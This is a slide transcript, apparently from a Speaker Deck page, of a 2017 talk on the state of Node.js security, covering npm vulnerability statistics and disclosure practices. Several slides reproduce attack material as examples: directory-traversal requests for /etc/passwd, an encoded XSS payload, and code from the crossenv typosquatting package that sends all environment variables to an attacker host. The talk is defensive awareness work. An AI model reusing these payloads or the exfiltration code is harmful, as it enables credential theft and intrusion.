Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The State of Node.js Security, at Node.js Interactive 2017

Tim Kadlec
October 05, 2017
Technology
1
250

The State of Node.js Security, at Node.js Interactive 2017

The Node ecosystem is thriving. But the more popular an ecosystem, the more interesting it looks to attackers. Let's look at the current state of security in Node. We'll talk about some of the interesting security improvements in Node in the past year. Drawing on original research, we'll also look at the frequency of vulnerabilities in npm packages, which types of vulnerabilities are the most frequent and the roles that enterprises, package owners and package managers all play in keeping Node.js secure.

Tim Kadlec

October 05, 2017
Tweet

More Decks by Tim Kadlec

See All by Tim Kadlec
JavaScript Exposed at Midwest JS
tkadlec
3
260
Focusing On What Matters, at Fluent, 2017
tkadlec
0
110
Once More, With Feeling at Code 2016 in Sydney
tkadlec
1
570
Once More, With Feeling
tkadlec
9
1.5k
Mobile Image Processing at London Web Perf Meetup, 2016
tkadlec
1
160
Better By Proxy at Velocity NY 2015
tkadlec
3
560
Getting Started with Performance Budgets at HighEdWeb Technical Academy, 2015
tkadlec
9
1.1k
Reaching Everyone, Fast at From the Front, 2015
tkadlec
8
6.7k
Better by Proxy at Smashing Conf NY
tkadlec
2
820

Other Decks in Technology

See All in Technology
生成AIの変革の時代に、 直近1年で直面した課題とその解決策
ktc_wada
0
390
[新卒向け研修資料] テスト文字列に「うんこ」と入れるな(2024年版)
infiniteloop_inc
4
16k
TechFeed Experts Night#27 〜 フロントエンドフレームワーク最前線 (Svelte)
baseballyama
1
550
GrafanaMeetup_AmazonManagedGrafanaのアクセス制御機能とマルチテナント環境下でのアクセス制御について
daitak
0
310
開発パフォーマンスを最大化するための開発体制
ham0215
2
470
require(ESM)とECMAScript仕様
uhyo
4
840
ルーターでプレゼンする
puhitaku
0
900
Delivering Millions of Messages within seconds @ Duolingo
pelelgrino
0
350
MapLibreとAmazon Location Service
dayjournal
1
160
推しは推せるときに推せ! プロダクトにフィードバックしていこう
nakasho
0
400
ServiceNow Knowledge 24の歩き方 EYストラテジー・アンド・コンサルティング
manarobot
0
200
Cypress or Playwright?
rainerhahnekamp
0
140

Featured

See All Featured
Atom: Resistance is Futile
akmur
259
25k
In The Pink: A Labor of Love
frogandcode
138
21k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
30
6k
Building Your Own Lightsaber
phodgson
99
5.7k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
9
8.3k
How GitHub Uses GitHub to Build GitHub
holman
468
290k
Optimising Largest Contentful Paint
csswizardry
8
2.4k
Designing for Performance
lara
601
67k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
34
8.9k
Bootstrapping a Software Product
garrettdimon
PRO
302
110k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
155
14k

Transcript

  1. THE STATE OF NODE SECURITY Tim Kadlec @tkadlec

  2. None

  3. IF YOU CONNECT IT TO THE INTERNET, SOMEONE WILL TRY

    TO HACK IT. Brian Krebs

  4. https:/ /bit.ly/cloudpets

  5. bind_ip = 127.0.0.1

  6. SECURE BY DEFAULT

  7. None
  8. None

  9. THE ENEMY IS OUT THERE. Kim Crayton

  10. None

  11. http:/ /bit.ly/node-sou

  12. 156,000 Package authors

  13. 9 MILLION Different Users

  14. https:/ /bit.ly/npm-2fa

  15. 526 Published Vulns in 2017
 (So Far)

  16. 66% High Severity 32% Medium Severity 2% Low Severity

  17. 1 Directory Traversal 2 Resources over Insecure Protocol 3 Cross-Site

    Scripting (XSS) 4 Malicious Packages 5 Regular Expression Denial of Service

  18. https:/ /bit.ly/next-vuln

  19. /_next /static

  20. defineRoutes () { const routes = { /* ... */

    '/_next/:path+': async (req, res, params) => { const p = join(__dirname, '..', 'client', ...(params.path || [])) await this.serveStatic(req, res, p) }, '/static/:path+': async (req, res, params) => { const p = join(this.dir, 'static', ...(params.path || [])) await this.serveStatic(req, res, p) } /* ... */ } }

  21. defineRoutes () { const routes = { /* ... */

    '/_next/:path+': async (req, res, params) => { const p = join(__dirname, '..', 'client', ...(params.path || [])) await this.serveStatic(req, res, p) }, '/static/:path+': async (req, res, params) => { const p = join(this.dir, 'static', ...(params.path || [])) await this.serveStatic(req, res, p) } /* ... */ } }

  22. defineRoutes () { const routes = { /* ... */

    '/_next/:path+': async (req, res, params) => { const p = join(__dirname, '..', 'client', ...(params.path || [])) await this.serveStatic(req, res, p) }, '/static/:path+': async (req, res, params) => { const p = join(this.dir, 'static', ...(params.path || [])) await this.serveStatic(req, res, p) } /* ... */ } }

  23. export function serveStatic (req, res, path) { return new Promise((resolve,

    reject) => { send(req, path) .on('directory', () => { err.code = 'ENOENT' reject(err) }) .on('error', reject) .pipe(res) .on('finish', resolve) }) }

  24. GET /_next/../../../../../../../../../etc/passwd HTTP/1.1 GET /_next\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

  25. isServeableUrl (path) { const resolved = resolve(path) if ( resolved.indexOf(join(this.dir,

    this.dist) + sep) !== 0 && resolved.indexOf(join(this.dir, 'static') + sep) !== 0 ) { // Seems like the user is trying to traverse the filesystem. return false } return true }

  26. https:/ /bit.ly/next-fix

  27. 1 Directory Traversal 2 Resources over Insecure Protocol

  28. curl -ocurl-7.34.0.tar.gz http://curl.haxx.se/download/curl-7.34.0.tar.gz

  29. 1 Directory Traversal 2 Resources over Insecure Protocol 3 Cross-Site

    Scripting (XSS)

  30. http:/ /bit.ly/angular-xss

  31. var uriAttrs = toMap("background,cite,href,longdesc,src,xlink:href");

  32. <img src="blah.gif" usemap="#blahmap"> <map name="blahmap"> <area shape="rect" coords="0,0,145,126" a-=">" href="j&#x61;vascript:&#x61;lert(-1)">

    </map>

  33. 1 Directory Traversal 2 Resources over Insecure Protocol 3 Cross-Site

    Scripting (XSS) 4 Malicious Packages

  34. https:/ /bit.ly/malicious-npm

  35. TYPOSQUATTING

  36. None

  37. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <[email protected]> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  38. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <[email protected]> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  39. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  40. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  41. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  42. https:/ /bit.ly/npm-crossenv

  43. 1 Directory Traversal 2 Resources over Insecure Protocol 3 Cross-Site

    Scripting (XSS) 4 Malicious Packages 5 Regular Expression Denial of Service

  44. var regex = /A(B|C+)+D/;

  45. var regex = /A(B|C+)+D/; A

  46. var regex = /A(B|C+)+D/; (B|C+)

  47. var regex = /A(B|C+)+D/; +

  48. var regex = /A(B|C+)+D/; D

  49. var regex = /A(B|C+)+D/; ABBD ABCCCCD ABCBCCCD ACCCCCD

  50. None
  51. None
  52. None
  53. None

  54. ACCCX CCC CC+C C+CC C+C+C var regex = /A(B|C+)+D/;

  55. String Number of C’s Number of Steps ACCCX 3 38

    ACCCCX 4 71 ACCCCCX 5 136 ACCCCCCCCCCCCCCX 14 65,553

  56. http:/ /bit.ly/safe-regex

  57. https:/ /bit.ly/redos-help

  58. Time Risk

  59. Vulnerability discovered Time Risk

  60. Vulnerability discovered Vulnerability announced Time Risk

  61. Vulnerability discovered Vulnerability announced Vulnerability patched Time Risk

  62. Vulnerability discovered Vulnerability announced Vulnerability patched Users begin patching Time

    Risk

  63. 80% No Public Facing Disclosure Policy

  64. https:/ /bit.ly/security-text

  65. 70% Release Notes

  66. 30% Deprecate the Version

  67. 3% Inform a Vulnerability Service

  68. 15% Say They Don’t Bump Dependency Versions

  69. SILVER LINING

  70. YOU

  71. 526 Published Vulns in 2017
 (So Far)

  72. 142 Different People & Organizations

  73. https:/ /bit.ly/malicious-npm

  74. NOT GREAT

  75. NOT GREAT BUT FIXABLE

  76. THANK YOU Tim Kadlec @tkadlec